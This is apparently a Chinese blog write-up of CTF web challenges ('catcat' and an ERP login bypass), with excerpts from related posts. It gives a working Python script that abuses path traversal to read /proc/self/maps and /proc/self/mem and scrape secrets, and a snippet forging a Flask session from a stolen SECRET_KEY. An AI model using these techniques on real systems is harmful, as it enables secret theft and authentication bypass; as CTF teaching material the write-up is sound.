CATcat_wp_web flask 和华夏erp

最新推荐文章于 2025-09-29 19:16:03 发布
原创 最新推荐文章于 2025-09-29 19:16:03 发布 · 652 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #linux #flask

文章描述了一次网络安全挑战,涉及到web应用中的文件读取漏洞,包括session伪造、任意文件读取。问题在于一个使用PythonFlask框架的应用,flag被存储在内存中并随后删除。作者通过读取Linux的/proc/self/mem来尝试找到被删除的flag,编写脚本从可读内存区域进行搜索。此外,还提到了对JS文件的分析以寻找认证绕过的线索。

CATctf web 方向有关文件读取,session伪造,任意文件读取,内存读取

CATCAT

存在文件任意读取,试一下etc/passwd

抓包看后是python flask框架 app.py

尝试读取主程序源代码

查看后发现读取flag后又删除,flag保存在内存之中

linux下存在 proc 目录 下 cmdline cwd exe environ fd (如果用os remove ,目录下还可以得到被删除内容) self**

直接读根目录下flag不存在,读取内存 proc/self/mem linux内存权限不同区域不同,读取可读取区域的内存 用 proc/self/maps看不同区域的权限


写个脚本读取全部内存rw,然后寻找flag

最后脚本代码

import requests
import re

url="http://61.147.171.105:59618"
site="info?file=../../../proc/self/mem&start=%s&end=%s"
maps_reg = "([a-z0-9]{12}-[a-z0-9]{12}) rw.*?00000000 00:00 0"
maps_url = f"{url}/info?file=../../../../../proc/self/maps"
maps = re.findall(maps_reg,requests.get(maps_url).text)
        
for m in maps:
        start,end=m.split('-')[0],m.split('-')[1]
        #start,end =int (start,16),int (end,16)
        print(start,end)
        start=str(int(start,16))
        end=str(int(end,16))
        readurl=f'{url}/info?file=../../../../proc/self/mem&start={start}&end={end}'
        res=requests.get(readurl).content
        #secret = re.findall(b"[a-z0-9A-Z]{32}\*abcdefgh",res)
        #if secret:
        #   print(secret)
        flag = re.findall(b"[a-zA-Z]{4}\{[a-z0-9A-Z-_]*\}",res)
        if flag:
            print(flag)

easypass
找奇怪的js,发现login.JS 查看源码
源码写erp系统,搜一下,发现有检验漏洞



跟着图pass

结束 信息搜集 认证绕过

CTF之一天一题:攻防世界的web进阶之Cat
qq_42728977的博客
08-27 1742
这个题做的还是太明白,看了许多wp。在此小记录一下。 题目这个鸭子,看到以为是sql注入,但又看是输入域名,然后返回ping的结果,又像是命令执行漏洞,于是各种姿势试,无果。开始看wp。 大佬们是先fuzz一波,发现当url=@的时候报错,而@的的url编码是%80, ...
catf1ag Web writeup(wp) 可能会持续更新
mumuzi的博客
01-14 3810
catf1ag web水文
CatCTF2022 web wp
2301_79035389的博客
09-25 873
进来啥也没有,只有一个特殊点,is_admin,但是直接改成true进去也不是admin,看wp才知道这里竟然是要打一个黑盒的原型链污染有思路就好办了,把数据包丢给ai整一个payload出来。
华夏ERP-V3.2 部署(windows)
weixin_47631745的博客
05-19 4739
(因为之前安装JDK的版本是18,刚开始也替换了pom.xml的jdk版本,然后报错,接着改了Project Structrue的jdk版本,还是报错,又接着改settings里面build的jdk版本,也是各种报错,最后还是在Project Structrue那里老老实实的下载了一个1.8,改回来用的1.8)(第一次源码部署项目使用IDEA,菜鸟一个,选择导入的jshERP-3.2,IDEA不能识别,导致各种问题,自己去配置Project Structrue,走了弯路。
攻防世界WEB进阶——Cat wp
weixin_42499640的博客
07-31 1421
首先打开题目是个发现是个云端测试 提示输入域名 先输个baidu.com 没反应 输入百度的ip 220.181.38.148 反馈了 PING 220.181.38.148 (220.181.38.148) 56(84) bytes of data. --- 220.181.38.148 ping statistics --- 1 packets transmitted, 0 receive...
flask基于的智能ERP管理系统(毕设源码+论文)
溪言学姐毕设
11-12 734
本选题将以企业智能化管理为研究情景,重点分析研究智能ERP管理系统的构建与优化问题,以期探寻在人工智能时代下ERP系统全面智能化的问题原因机制等,提出有效的对策建议,为后续更加深入的研究提供基础。利用对供应商、仓库信息、商品类别、库存采购等信息的智能分析,优化供应链管理,降低成本,提高企业的竞争力。其次进一步明确毕业论文的目标与方向、分析论文的选题背景、整理论题主要内容以及该论文要实现的功能创新点,完成开题报告的填写,经指导教师审查修改后,最终落实完成该阶段工作,并将相关电子版材料提交指导教师保存。
攻防世界33 catcat-new【文件包含/flask_session伪造】
2401_86190146的博客
02-10 2150
1.:是一个文本文件,存储了系统中所有用户的基本信息,任何用户都可以读取该文件,但只有超级用户(root)可以修改它,该文件的存在有助于系统识别管理用户账户。文件中的每一行代表一个用户账户,每行由冒号分隔成 7 个字段,基本格式:用户名:口令(密码):用户标识号(UID):组标识号(GID):注释性描述(相当于备注):用户主目录(用户登录系统后默认进入的目录):登录Shell(用户登录系统后默认使用的shell程序)2./proc/self。
攻防世界-WEB-catcat-new
m0_52061428的博客
06-29 1593
第一段我们确定了flag,第二段我们知道了/admin确实有做限制,只有当session获取admin=1时才能获取flag 又因为flask存在session可以被伪造的问题,所以我们接下来要做的就是伪造session从而获取flag
NSSCTF-WEB-easy_eval
m0_52061428的博客
10-16 1590
说是easy,实际很difficult。
攻防世界-Webcatcat-new(学习笔记)
最新发布
m0_45294779的博客
09-29 696
摘要:通过文件读取漏洞获取Flask应用的secret_key,伪造管理员session获取flag。首先利用任意文件读取漏洞获取/proc/self/cmdlineapp.py源码,发现需要admin=1的session访问/admin路径。然后读取/proc/self/maps/proc/self/mem获取内存中的secret_key,使用flask-session-cookie-manager工具生成伪造session。最后修改cookie中的session值访问/admin路径成功获取flag
131,【2】 攻防世界 catcat-new
2402_87039650的博客
02-12 527
点击图片时发现url处很可疑。
Flask集成的ERP系统Demo 该项目是一个基于FlaskWeb版本ERP系统Demo,旨在实现企业信息管理的基础功能
07-20
### 项目名称:Flask集成的ERP系统Demo ### 项目简介: 该项目是一个基于FlaskWeb版本ERP系统Demo,旨在实现企业信息管理的基础功能。系统主要功能包括表单填写、数据上传、数据查询美化的数据库界面(增删改查功能)。该系统可以帮助企业有效地管理查询各种信息,提高工作效率。 ### 主要功能: 1. **数据表导入导出:** - 支持上传企业调查表文件(如Excel文件),并将数据导入数据库。 - 支持导出当前数据或全部数据,便于数据备份迁移。 2. **层级目录筛选公司信息:** - 通过层级目录筛选公司全部信息,包括文字图片。 - 便于用户快速查找管理企业信息。 3. **图片导入:** - 支持企业图片的导入管理,增强信息展示的直观性。 4. **表单输入:** - 提供详细的表单输入功能,用户可以输入更新企业信息。 ### 板块信息要求: 系统中的企业信息管理板块需要包含以下字段: - 单位名称 - 统一社会信用代码 - 运行状态(运行、停产、关闭) - 生产地址 - 联系人 - 联系方式
华夏erp项目工程源码
11-15
华夏erp项目工程源码
likes-framework:链接信息知识环境软件(LIKES),这是用Flask编写的ERP,具有可自定义的模块,可以轻松地创建一个模块。 就像小ODOO
05-01
LIKES框架-版本1 特征 准备使用的应用程序 快速安全 内置模块模型: 身份验证:用户 管理员:资讯主页 核心:索引命令行参数 容易修改 内置模型(您的常用项目模型) 不要再从头创建客户表或地址表,您只需实施即可,!!! 在模块中实现内置模型的示例代码 from app . core . models import CoreCustomer , Base # Import the built-in models class Customer ( CoreCustomer ) # Inherit built-in model to your class to implement __tablename__ = 'table_name' # Include here your fields 它超级容易!!! homebest.py命令行参数 要创建系统的超级用户或
基于JavaVue的小企业开源ERP软件华夏设计源码
04-19
本源码为基于JavaVue的小企业开源ERP软件华夏设计,共包含728个文件,其中java文件309个,vue文件226个,xml文件63个,js文件58个,jpg文件13个,less文件11个,png文件10个,xls文件7个,sh文件5个,gitattributes文件3个。该项目是一个小企业开源ERP软件,目前专注进销存+财务+生产功能,包括零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等模块。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能,并拥有商品库存、出入库统计等报表。同时对角色权限进行了管理。
SpringBoot 框架华夏 ERP 源码审计1
08-03
1. requestUrl 中如果存在 / doc.html,/register.html,/login.html 字段就可 2. 传 verify() 法进判
flask毕设ERP小型企业内部管理(论文+程序)
zhihao503的博客
11-07 660
本研究将围绕ERP小型企业内部管理系统的功能展开,具体包括员工管理、人事部管理、采购部管理、销售部管理、财务部管理、员工考勤、离职申请、调薪申请、采购申请、请假申请、供应商管理、仓库部管理、采购计划管理、采购合同管理、客户管理、销售合同管理、报价申请管理、收付款管理、发票管理、物品信息管理、物品类型管理、物品入库管理物品出库管理等系统功能。理论意义在于,通过对小型企业ERP系统实施过程中的关键问题进行分析,可以丰富完善ERP系统应用理论,为小型企业ERP系统的研究应用提供新的视角方法。
[开题]flask框架中小型制造型企业erp管理系统0t90v9(程序+论文+python
三水计算机毕设程序
08-29 1214
在当今竞争激烈的全球市场中,中小型制造型企业面临着诸多挑战,包括成本控制、生产效率提升、供应链优化以及信息管理复杂化等问题。随着企业规模的扩大业务范围的拓展,传统的手工管理模式已难以满足企业快速发展的需求。因此,引入一套高效、集成的企业资源计划(ERP)管理系统成为中小型制造型企业提升管理水平的必然选择。ERP系统能够整合企业内部的各个部门与业务流程,实现数据的实时共享与协同作业,从而提高企业的运营效率市场竞争力。
【附源码】基于flask框架的ERP系统财务子系统设计与实现(python+mysql+论文)
JAVA程序设计
04-13 1140
总之,本毕业设计题目旨在通过设计实现一个ERP系统财务子系统,为企业提供一种高效、便捷的财务管理解决方案,有助于提升企业的竞争力市场地位。本系统采用Python语言,并基于Flask框架构建。PyCharm是一个强大的Python IDE,它提供了丰富的开发工具插件支持,包括对Flask框架的友好支持。在数据库管理工具的选择上,使用了Navicat 11,这是一个用户友好且功能强大的数据库管理软件,它支持多种数据库系统,包括MySQL,并提供了图形化界面,使得数据库的管理维护工作更加便捷。
catctf catcat new
07-19
在CTF(夺旗赛)中,`catcat-new` 是一个常见的网络安全挑战,通常涉及Web安全漏洞,例如文件包含、Flask session伪造、内存信息泄露等攻击手段。这类挑战的目标是通过利用Web应用的漏洞获取敏感信息或获得系统控制权限。 ### 问题分析 `catcat-new` 挑战通常基于 Flask 框架,其关键点在于利用文件包含漏洞读取 `/proc/self/mem` 文件,从中提取 Flask 的 `SECRET_KEY`。Flask 使用该密钥来签名会话(session),一旦攻击者获得该密钥,就可以伪造 session,从而实现身份绕过或提权。 ### 攻击流程 1. **读取 `/proc/self/maps`**: - 该文件列出了当前进程的内存映射区域。 - 攻击者通过访问 `/proc/self/maps`,寻找具有读写权限(`rw`)的内存段。 - 获取内存段的起始结束地址范围,用于下一步读取内存内容 [^2]。 2. **读取 `/proc/self/mem`**: - 构造特定请求,读取之前找到的内存地址范围。 - 利用正则表达式从内存内容中提取 Flask 的 `SECRET_KEY`,该密钥通常以 32 位小写字母数字组成,并可能带有特定标识符(如 `*abcdefgh`) [^1]。 3. **伪造 Flask Session**: - 使用提取的 `SECRET_KEY` 对 Flask session 进行签名。 - 构造恶意 session,注入特定 payload,例如修改用户权限或执行任意命令。 ### 示例代码 以下是一个用于提取 `SECRET_KEY` 的脚本示例: ```python import re import requests # 读取内存映射表 maps_url = "http://target.com/proc/self/maps" mem_info = requests.get(maps_url).text.split('\n') for line in mem_info: match = re.match(r"([0-9a-f]+)-([0-9a-f]+) rw", line) if match: start = int(match.group(1), 16) end = int(match.group(2), 16) mem_url = f"http://target.com/proc/self/mem?start={start}&end={end}" mem_content = requests.get(mem_url).text secret_key = re.findall(r"[a-z0-9]{32}\*abcdefgh", mem_content) if secret_key: print(f"Found SECRET_KEY: {secret_key}") break ``` ### Flask Session 伪造示例 使用 `itsdangerous` 库伪造 Flask session: ```python from itsdangerous import URLSafeTimedSerializer # 假设已知的 SECRET_KEY secret_key = 'your_extracted_secret_key_here' # 创建 session 签名器 serializer = URLSafeTimedSerializer(secret_key) # 构造恶意 session 数据 malicious_session = { 'user': 'admin', 'role': 'admin' } # 生成签名后的 session signed_session = serializer.dumps(malicious_session) print(f"Signed Session: {signed_session}") ``` ### 防御措施 - **避免直接暴露 `/proc` 文件系统**:限制对 `/proc/self/mem` `/proc/self/maps` 的访问。 - **增强 Flask 安全配置**: - 使用强随机 `SECRET_KEY`。 - 设置 `SESSION_COOKIE_SECURE=True`,防止中间人窃取 session。 - 启用 `SESSION_COOKIE_HTTPONLY=True`,防止 XSS 攻击窃取 cookie [^3]。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值